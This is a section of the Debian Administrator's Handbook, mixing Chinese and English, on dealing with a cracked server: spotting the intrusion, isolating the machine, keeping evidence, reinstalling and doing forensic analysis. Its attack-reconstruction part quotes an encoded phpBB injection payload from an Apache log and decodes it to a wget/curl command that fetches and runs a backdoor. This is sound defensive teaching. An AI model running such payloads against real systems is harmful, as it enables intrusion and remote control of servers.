Product SiteDocumentation Site

14.7. 处理被攻陷的机器


14.7.1. 探测并观察黑客入侵

Cracking acts are often not detected until they have direct consequences on the legitimate services hosted on the machine, such as connections slowing down, some users being unable to connect, or any other kind of malfunction. Faced with these problems, the administrator needs to have a good look at the machine and carefully scrutinize what misbehaves. This is usually the time when they discover an unusual process, for instance, one named apache instead of the standard /usr/sbin/apache2. If we follow that example, the thing to do is to note its process identifier, and check /proc/pid/exe to see what program this process is currently running:
# ls -al /proc/3719/exe
lrwxrwxrwx 1 www-data www-data 0 2007-04-20 16:19 /proc/3719/exe -> /var/tmp/.bash_httpd/psybnc
一个程序安装在 /var/tmp/ 并作为网页服务器运行?毋庸置疑,机器已经被攻陷了。
  • 命令的某个选项不起作用了;命令自己声明的软件版本与根据 dpkg 安装的预期版本不一致;
  • 命令行提示或者会话问候显示最后的连接源于其他洲的未知服务器;
  • /tmp/ 分区已经被错误填满,而且都是由于非法的电影拷贝产生的;
  • 等等。

14.7.2. 把服务器下线

This may only be possible if the server is physically accessible. When the server is hosted in a hosting provider's data center halfway across the country, or if the server is not accessible for any other reason, it is usually a good idea to start by gathering some important information (see 第 14.7.3 节 “保留所有可以作为证据的东西”, 第 14.7.5 节 “法医分析” and 第 14.7.6 节 “重构攻击场景”), then isolating that server as much as possible by shutting down as many services as possible (usually, everything but sshd). This case is still awkward, since one can't rule out the possibility of the attacker having SSH access like the administrator has; this makes it harder to “clean” the machines.

14.7.3. 保留所有可以作为证据的东西

要知道针对攻击者的反击和从事法律活动需要所有重要元素的复本;包括硬盘内容,所有允许进程的清单,所有打开连接的清单。RAM 的内容也可以被使用,但是实践中很少使用。
在斗争最激烈的时候,管理员往往倾向于在感染电脑上执行许多检查;这通常不是一个好主意。每个命令都有可能已经被更改了并有可能擦除证据片段。检查应该限制在最小范围内(对于网络连接 netstat -tupan,列出所有进程 ps auxf,正在运行程序的信息 ls -alR /proc/[0-9]*),每个已进行过的检查都要仔细记下来。
一旦“动态”元素已经被保存,下一步就是存储整个硬盘镜像。如果文件系统仍在变化,是不可能制作镜像的,就需要以只读方式挂载。最简单的办法是(在运行 sync 后)直接停机并使用救援 CD 重启系统。每个分区使用类似 dd 来拷贝;这些镜像可以发送到其他服务器(可以使用很方便的 nc 工具)。另一种可能更简单:把磁盘从机器里取出来并使用新的替代它,从新格式化,重装系统。

14.7.4. 重新安装

The server should not be brought back on line without a complete reinstallation. If the compromise was severe (if administrative privileges were obtained), there is almost no other way to be sure that we get rid of everything the attacker may have left behind (particularly backdoors). Of course, all the latest security updates must also be applied so as to plug the vulnerability used by the attacker. Ideally, analyzing the attack should point at this attack vector, so one can be sure of actually fixing it; otherwise, one can only hope that the vulnerability was one of those fixed by the updates.
Reinstalling a remote server is not always easy; it may involve assistance from the hosting company, because not all such companies provide automated reinstallation systems or remote consoles (although these cases should be rare). Care should be taken not to reinstall the machine from backups taken later than the compromise. Ideally, only data should be restored, the actual software should be reinstalled from the installation media.

14.7.5. 法医分析

现在服务被恢复,是时候看看感染系统的磁盘镜像,找到攻击向量了。当加载这些镜像是,注意使用 ro,nodev,noexec,noatime 选项来避免改变其内容(包括读取文件的时间戳)或者误运行感染程序。
  • .bash_history 文件可用于查阅;
  • 也会列出最近创建,修改和读取的文件;
  • strings 通过从二进制中提取字符串,可辅助用于识别攻击者安装的程序;
  • /var/log/ 日志文件可重建事件记录;
  • 特殊用途的工具可用于恢复潜在被删除的文件,包括攻击者删除的日志文件。
Some of these operations can be made easier with specialized software. In particular, the sleuthkit package provides many tools to analyze a filesystem. Their use is made easier by the Autopsy Forensic Browser graphical interface (in the autopsy package). Some Linux distributions have a "live install" image and contain many programs for forensic analysis, such as Kali Linux (see 第 A.8 节 “Kali Linux”), with its forensic mode, BlackArchLinux, and the commercial Grml-Forensic, based on Grml (see 第 A.6 节 “Grml”).

14.7.6. 重构攻击场景

下面的日志文件截取自 Apache access.log - - [27/Nov/2004:13:33:34 +0100] "GET /phpbb/viewtopic.php?t=10&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(124)%252echr(124)%252echr(32)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(38))%252e%2527 HTTP/1.1" 200 27969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
This example matches exploitation of an old security vulnerability in phpBB.
破译这段 URL 就会明白,攻击者成功运行了一些 PHP 代码,即:system("cd /tmp; wget || curl -o bd; chmod +x bd; ./bd &")。实际上,在/tmp/会发现一个 bd 文件。运行 strings /mnt/tmp/bd 会发现字符串 PsychoPhobia Backdoor is starting...。这也确实看起来像个后门。
随后,访问权限会被用来下载,安装和运行连接到地下 IRC 网络的 机器人-bot。这个机器人通过 IRC 协议控制,用于下载文件并共享。程序甚至有自己的日志文件:
** 2004-11-29-19:50:15: NOTICE: :GAB! NOTICE ReV|DivXNeW|504 :DCC Chat (
** 2004-11-29-19:50:15: DCC CHAT attempt authorized from GAB!SEX@RIZON-2EDFBC28.POOL8250.INTERBUSINESS.IT
** 2004-11-29-19:50:15: DCC CHAT received from GAB, attempting connection to
** 2004-11-29-19:50:15: DCC CHAT connection suceeded, authenticating
** 2004-11-29-19:50:20: DCC CHAT Correct password
** 2004-11-29-19:50:49: DCC Send Accepted from ReV|DivXNeW|502: In.Ostaggio-iTa.Oper_-DvdScr.avi (713034KB)
** 2004-11-29-20:10:11: DCC Send Accepted from GAB: La_tela_dell_assassino.avi (666615KB)
** 2004-11-29-21:10:36: DCC Upload: Transfer Completed (666615 KB, 1 hr 24 sec, 183.9 KB/sec)
** 2004-11-29-22:18:57: DCC Upload: Transfer Completed (713034 KB, 2 hr 28 min 7 sec, 80.2 KB/sec)
同时,攻击者也下载了一对额外文件,/tmp/pt/tmp/loginx。运行 strings 命令分析文件会发现诸如Shellcode placed at 0x%08lxNow wait for suid shell...。这些看起来像是程序利用本地漏洞获取管理员特权。他们达到目的了吗?本例中,视乎没有,因为在他们开始活动之后,看起来没有文件被修改。